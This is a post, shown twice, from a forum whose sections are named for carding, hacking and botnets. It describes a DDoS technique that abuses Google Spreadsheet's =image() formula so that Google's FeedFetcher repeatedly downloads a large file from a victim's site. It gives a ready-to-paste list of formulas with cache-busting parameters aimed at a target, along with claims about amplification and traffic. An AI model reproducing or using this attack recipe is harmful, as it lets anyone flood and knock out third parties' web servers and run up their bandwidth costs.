Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
DDOS Attack using Google Spreadsheet
Message
<blockquote data-quote="Ghosthunter" data-source="post: 561" data-attributes="member: 6"><p>Google uses its "spider" FeedFetcher to cache any content in Google Spreadsheet inserted using the formula =image("link").</p><p></p><p><a href="https://docs.google.com/spreadsheet/" target="_blank">https://docs.google.com/spreadsheet/</a></p><p></p><p>For example, if you insert a formula in one of the table cells</p><p></p><p>Code:</p><p>=image("<a href="http://example.com/image.jpg" target="_blank">http://example.com/image.jpg</a>")</p><p></p><p>Google will send the FeedFetcher spider to download this image and cache it for further display in the table.</p><p></p><p>However, if you add a random parameter to the image URL, FeedFetcher will download it again each time. For example, the victim's website has a 10 MB PDF file. Inserting such a list into a table will cause the Google spider to download the same file 1000 times!</p><p></p><p>Code:</p><p>=image("<a href="http://targetname/file.pdf?r=1" target="_blank">http://targetname/file.pdf?r=1</a>")</p><p></p><p>=image("<a href="http://targetname/file.pdf?r=2" target="_blank">http://targetname/file.pdf?r=2</a>")</p><p></p><p>=image("<a href="http://targetname/file.pdf?r=3" target="_blank">http://targetname/file.pdf?r=3</a>")</p><p></p><p>=image("<a href="http://targetname/file.pdf?r=4" target="_blank">http://targetname/file.pdf?r=4</a>")</p><p></p><p>...</p><p></p><p>=image("<a href="http://targetname/file.pdf?r=1000" target="_blank">http://targetname/file.pdf?r=1000</a>")</p><p></p><p>All this can lead to the exhaustion of the traffic limit for some site owners. Anyone using just a browser with one tab open can launch a massive HTTP GET FLOOD attack on any web server.</p><p></p><p>The attacker doesn't even need to have a fast channel. Since the formula uses a link to a PDF file (i.e., not to an image that could be displayed in the table), the attacker receives only N/A in response from the Google server. This makes it quite easy to multiply the attack [Analogous to DNS and NTP Amplification-approx. translator's note], which is a serious threat.</p><p></p><p>Using a single laptop with multiple tabs open, just by copying and pasting lists of links to files of 10 MB each, the Google spider can download this file at speeds of more than 700 Mbps.</p><p></p><p>In my case, it lasted for 30-45 minutes, until I shut down the server. If I calculated everything correctly, it took about 240GB of traffic in 45 minutes.</p></blockquote><p></p>
[QUOTE="Ghosthunter, post: 561, member: 6"] Google uses its "spider" FeedFetcher to cache any content in Google Spreadsheet inserted using the formula =image("link"). [URL]https://docs.google.com/spreadsheet/[/URL] For example, if you insert a formula in one of the table cells Code: =image("[URL]http://example.com/image.jpg[/URL]") Google will send the FeedFetcher spider to download this image and cache it for further display in the table. However, if you add a random parameter to the image URL, FeedFetcher will download it again each time. For example, the victim's website has a 10 MB PDF file. Inserting such a list into a table will cause the Google spider to download the same file 1000 times! Code: =image("[URL]http://targetname/file.pdf?r=1[/URL]") =image("[URL]http://targetname/file.pdf?r=2[/URL]") =image("[URL]http://targetname/file.pdf?r=3[/URL]") =image("[URL]http://targetname/file.pdf?r=4[/URL]") ... =image("[URL]http://targetname/file.pdf?r=1000[/URL]") All this can lead to the exhaustion of the traffic limit for some site owners. Anyone using just a browser with one tab open can launch a massive HTTP GET FLOOD attack on any web server. The attacker doesn't even need to have a fast channel. Since the formula uses a link to a PDF file (i.e., not to an image that could be displayed in the table), the attacker receives only N/A in response from the Google server. This makes it quite easy to multiply the attack [Analogous to DNS and NTP Amplification-approx. translator's note], which is a serious threat. Using a single laptop with multiple tabs open, just by copying and pasting lists of links to files of 10 MB each, the Google spider can download this file at speeds of more than 700 Mbps. In my case, it lasted for 30-45 minutes, until I shut down the server. If I calculated everything correctly, it took about 240GB of traffic in 45 minutes. [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
DDOS Attack using Google Spreadsheet
Top